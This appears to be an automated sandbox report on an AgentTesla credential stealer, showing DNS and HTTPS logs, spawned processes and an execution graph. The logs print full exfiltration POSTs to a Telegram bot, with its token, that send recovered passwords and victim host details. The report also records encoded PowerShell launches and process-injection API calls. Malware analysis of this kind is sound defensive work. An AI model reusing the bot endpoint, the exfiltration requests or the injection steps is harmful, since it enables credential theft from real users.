                                                                                                                              Mar 20, 2023 19:38:26.481441975 CET192.168.2.48.8.8.80xcca0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.449285030 CET192.168.2.48.8.8.80x51a8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.475931883 CET192.168.2.48.8.8.80x749dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.851300955 CET192.168.2.48.8.8.80x296dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.912009001 CET192.168.2.48.8.8.80x3d84Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:50.132524967 CET192.168.2.48.8.8.80x85fbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.553659916 CET8.8.8.8192.168.2.40x8136No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:19.580924988 CET8.8.8.8192.168.2.40xdac7No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:38:26.498725891 CET8.8.8.8192.168.2.40xcca0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.469089985 CET8.8.8.8192.168.2.40x51a8No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:25.498383999 CET8.8.8.8192.168.2.40x749dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.876548052 CET8.8.8.8192.168.2.40x296dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:47.930107117 CET8.8.8.8192.168.2.40x3d84No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                              Mar 20, 2023 19:39:50.152019978 CET8.8.8.8192.168.2.40x85fbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • api.ipify.org
                                                                                                                              • api.telegram.org

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.449697104.237.62.211443C:\Users\user\Desktop\file.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2023-03-20 18:38:20 UTC0OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2023-03-20 18:38:20 UTC0INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 14
                                                                                                                              Content-Type: text/plain
                                                                                                                              Date: Mon, 20 Mar 2023 18:38:20 GMT
                                                                                                                              Vary: Origin
                                                                                                                              Connection: close
                                                                                                                              2023-03-20 18:38:20 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                                                              Data Ascii: 102.129.143.78


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              1192.168.2.449698149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2023-03-20 18:38:26 UTC0OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 972
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2023-03-20 18:38:26 UTC0INHTTP/1.1 100 Continue
                                                                                                                              2023-03-20 18:38:26 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 35 34 35 64 35 62 35 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 62 35 34 35 64 35 62 35 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 33 20 30 32 3a 31 37 3a 35 36 0a 55 73 65 72
                                                                                                                              Data Ascii: -----------------------------8db29b545d5b5a8Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db29b545d5b5a8Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/21/2023 02:17:56User
                                                                                                                              2023-03-20 18:38:27 UTC1INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 20 Mar 2023 18:38:26 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 727
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              {"ok":true,"result":{"message_id":315,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679337506,"document":{"file_name":"user-571345 2023-03-21 02-17-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBO2QYqCJM20estXBLwCOofputY_wWAAJYDwACJVnIUEQzGByZaiTfLwQ","file_unique_id":"AgADWA8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/21/2023 02:17:56\nUser Name: user/571345\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              2192.168.2.449700104.237.62.211443C:\Users\user\Desktop\file.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2023-03-20 18:39:26 UTC2OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2023-03-20 18:39:26 UTC2INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 14
                                                                                                                              Content-Type: text/plain
                                                                                                                              Date: Mon, 20 Mar 2023 18:39:26 GMT
                                                                                                                              Vary: Origin
                                                                                                                              Connection: close
                                                                                                                              2023-03-20 18:39:26 UTC2INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
                                                                                                                              Data Ascii: 102.129.143.78


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              3192.168.2.449702149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2023-03-20 18:39:50 UTC2OUTPOST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 972
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2023-03-20 18:39:50 UTC3INHTTP/1.1 100 Continue
                                                                                                                              2023-03-20 18:39:50 UTC3OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 62 61 30 32 63 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 31 36 39 33 36 34 37 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 32 39 38 62 61 30 32 63 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 30 2f 32 30 32 33 20 32 30 3a 35 39 3a 34 38 0a 55 73 65 72
                                                                                                                              Data Ascii: -----------------------------8db298ba02c5c53Content-Disposition: form-data; name="chat_id"6169364705-----------------------------8db298ba02c5c53Content-Disposition: form-data; name="caption"New PW Recovered!Time: 03/20/2023 20:59:48User
                                                                                                                              2023-03-20 18:39:50 UTC4INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Mon, 20 Mar 2023 18:39:50 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 727
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              {"ok":true,"result":{"message_id":316,"from":{"id":5687731944,"is_bot":true,"first_name":"Lightshine","username":"Lightshine_bot"},"chat":{"id":6169364705,"first_name":"99","last_name":"Grams","type":"private"},"date":1679337590,"document":{"file_name":"user-571345 2023-03-20 21-39-46.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBPGQYqHZ71GcGR33wIy_l8julCQfJAAJZDwACJVnIUAyROyqbjiMmLwQ","file_unique_id":"AgADWQ8AAiVZyFA","file_size":349},"caption":"New PW Recovered!\n\nTime: 03/20/2023 20:59:48\nUser Name: user/571345\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 102.129.143.78","caption_entities":[{"offset":178,"length":14,"type":"url"}]}}


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:19:37:41
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                              Imagebase:0x680000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:19:37:49
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:430592 bytes
                                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:19:37:49
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7c72c0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:19:38:14
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                              Imagebase:0x120000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:19:38:15
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                              Imagebase:0x810000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:19:38:26
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                                                                                                              Imagebase:0xb0000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 36%, ReversingLabs
                                                                                                                              • Detection: 44%, Virustotal, Browse
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:19:38:35
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                                                              Imagebase:0xff0000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 36%, ReversingLabs
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:19:38:45
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                                                                                                              Imagebase:0xf20000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:19:38:48
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:430592 bytes
                                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:19:38:48
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7c72c0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:19:38:55
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                                                                                                              Imagebase:0x840000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Target ID:13
                                                                                                                              Start time:19:39:16
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:430592 bytes
                                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:14
                                                                                                                              Start time:19:39:16
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7c72c0000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:19:39:21
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              Imagebase:0x670000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:19:39:45
                                                                                                                              Start date:20/03/2023
                                                                                                                              Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Imagebase:0xf20000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:153
                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                execution_graph 14235 56e00dc 14236 56e01d2 14235->14236 14237 56e01df 14236->14237 14252 56e2c82 14236->14252 14256 56e4045 14236->14256 14261 56e3c64 14236->14261 14265 56e3871 14236->14265 14270 56e33f3 14236->14270 14274 56e3932 14236->14274 14278 56e29f2 14236->14278 14281 56e2af4 14236->14281 14286 56e2874 14236->14286 14291 56e3698 14236->14291 14296 56e29df 14236->14296 14301 56e28de 14236->14301 14307 56e27e0 14236->14307 14312 56e28e3 14236->14312 14316 56e1b18 14252->14316 14320 56e1b12 14252->14320 14253 56e2c9c 14258 56e3742 14256->14258 14257 56e25bd 14258->14257 14324 56e1caa 14258->14324 14328 56e1cb0 14258->14328 14263 56e1caa WriteProcessMemory 14261->14263 14264 56e1cb0 WriteProcessMemory 14261->14264 14262 56e3c88 14263->14262 14264->14262 14267 56e3b94 14265->14267 14266 56e426e 14266->14237 14267->14266 14332 56e50e8 14267->14332 14337 56e50d8 14267->14337 14272 56e1caa WriteProcessMemory 14270->14272 14273 56e1cb0 WriteProcessMemory 14270->14273 14271 56e3421 14272->14271 14273->14271 14354 56e1bea 14274->14354 14358 56e1bf0 14274->14358 14275 56e3950 14362 56e1e58 14278->14362 14282 56e29f2 14281->14282 14283 56e3f1a 14282->14283 14285 56e1e58 CreateProcessA 14282->14285 14283->14237 14284 56e2a1f 14285->14284 14288 56e50d8 4 API calls 14286->14288 14366 56e50a0 14286->14366 14371 56e50a5 14286->14371 14287 56e25bd 14288->14287 14293 56e3b94 14291->14293 14292 56e426e 14292->14237 14293->14292 14294 56e50e8 2 API calls 14293->14294 14295 56e50d8 4 API calls 14293->14295 14294->14293 14295->14293 14298 56e3742 14296->14298 14297 56e25bd 14298->14297 14299 56e1caa WriteProcessMemory 14298->14299 14300 56e1cb0 WriteProcessMemory 14298->14300 14299->14298 14300->14298 14302 56e2873 14301->14302 14303 56e25bd 14302->14303 14304 56e50d8 4 API calls 14302->14304 14305 56e50a5 2 API calls 14302->14305 14306 56e50a0 2 API calls 14302->14306 14304->14303 14305->14303 14306->14303 14309 56e3b94 14307->14309 14308 56e426e 14308->14237 14309->14308 14310 56e50e8 2 API calls 14309->14310 14311 56e50d8 4 API calls 14309->14311 14310->14309 14311->14309 14376 56e2298 14312->14376 14380 56e2290 14312->14380 14313 56e2905 14317 56e1b5d SetThreadContext 14316->14317 14319 56e1ba5 14317->14319 14319->14253 14321 56e1b18 SetThreadContext 14320->14321 14323 56e1ba5 14321->14323 14323->14253 14325 56e1cb0 WriteProcessMemory 14324->14325 14327 56e1d4f 14325->14327 14327->14258 14329 56e1cf8 WriteProcessMemory 14328->14329 14331 56e1d4f 14329->14331 14331->14258 14333 56e50fd 14332->14333 14346 56e1a62 14333->14346 14350 56e1a68 14333->14350 14334 56e5110 14334->14267 14338 56e50a2 14337->14338 14339 56e50e2 14337->14339 14342 56e1b18 SetThreadContext 14338->14342 14343 56e1b12 SetThreadContext 14338->14343 14344 56e1a68 ResumeThread 14339->14344 14345 56e1a62 ResumeThread 14339->14345 14340 56e50cb 14340->14267 14341 56e5110 14341->14267 14342->14340 14343->14340 14344->14341 14345->14341 14347 56e1a68 ResumeThread 14346->14347 14349 56e1ad9 14347->14349 14349->14334 14351 56e1aa8 ResumeThread 14350->14351 14353 56e1ad9 14351->14353 